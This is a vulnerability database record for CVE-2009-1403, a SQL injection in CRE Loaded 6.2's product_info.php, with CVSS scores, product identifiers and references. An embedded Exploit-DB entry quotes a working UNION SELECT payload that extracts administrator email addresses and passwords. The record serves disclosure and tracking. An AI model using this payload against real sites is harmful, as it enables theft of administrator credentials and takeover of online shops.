ID CVE-2009-1403Type cveReporter cve@mitre.orgModified 2017-09-29T01:34:00
Description
SQL injection vulnerability in product_info.php in CRE Loaded 6.2 allows remote attackers to execute arbitrary SQL commands via the products_id parameter.
{"id": "CVE-2009-1403", "bulletinFamily": "NVD", "title": "CVE-2009-1403", "description": "SQL injection vulnerability in product_info.php in CRE Loaded 6.2 allows remote attackers to execute arbitrary SQL commands via the products_id parameter.", "published": "2009-04-24T14:30:00", "modified": "2017-09-29T01:34:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1403", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/8501", "http://www.securityfocus.com/bid/34640", "https://exchange.xforce.ibmcloud.com/vulnerabilities/49987"], "cvelist": ["CVE-2009-1403"], "type": "cve", "lastseen": "2021-02-02T05:40:01", "edition": 4, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:8501"]}], "modified": "2021-02-02T05:40:01", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-02-02T05:40:01", "rev": 2}, "vulnersScore": 7.5}, "cpe": ["cpe:/a:creloaded:cre_loaded:6.2"], "affectedSoftware": [{"cpeName": "creloaded:cre_loaded", "name": "creloaded cre loaded", "operator": "eq", "version": "6.2"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:creloaded:cre_loaded:6.2:*:*:*:*:*:*:*"], "cwe": ["CWE-89"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:creloaded:cre_loaded:6.2:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "34640", "refsource": "BID", "tags": ["Exploit"], "url": "http://www.securityfocus.com/bid/34640"}, {"name": "8501", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/8501"}, {"name": "creloaded-productinfo-sql-injection(49987)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/49987"}]}
{"exploitdb": [{"lastseen": "2016-02-01T07:31:01", "description": "CRE Loaded 6.2 (products_id) SQL Injection Vulnerability. CVE-2009-1403. Webapps exploit for php platform", "published": "2009-04-21T00:00:00", "type": "exploitdb", "title": "CRE Loaded 6.2 products_id SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1403"], "modified": "2009-04-21T00:00:00", "id": "EDB-ID:8501", "href": "https://www.exploit-db.com/exploits/8501/", "sourceData": "[+]-------------------------------------[+]\n[+] Homepage: http://www.creloaded.com/\n[+] Product: CRE Loaded v6.2\n[+] File: product_info.php\n[+] Parameter: product_id\n[+]-------------------------------------[+]\n[+] SQL Injection:\n[+] product_info.php?products_id=-1+union+select+1,concat_ws(0x203a20,admin_email_address,admin_password)+from+admin--\n[+]-------------------------------------[+]\n[+] Discovered by -=Player=-\n[+] http://NovuSec.com\n[+] http://Free-Hack.com\n[+]-------------------------------------[+]\n[+] Greetz to :\n[+] Lidloses_Auge, Suicide, enco, J0hn.X3r, Dexx, 2called-chaos, xant0x\n[+]-------------------------------------[+] \n\n# milw0rm.com [2009-04-21]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/8501/"}]}
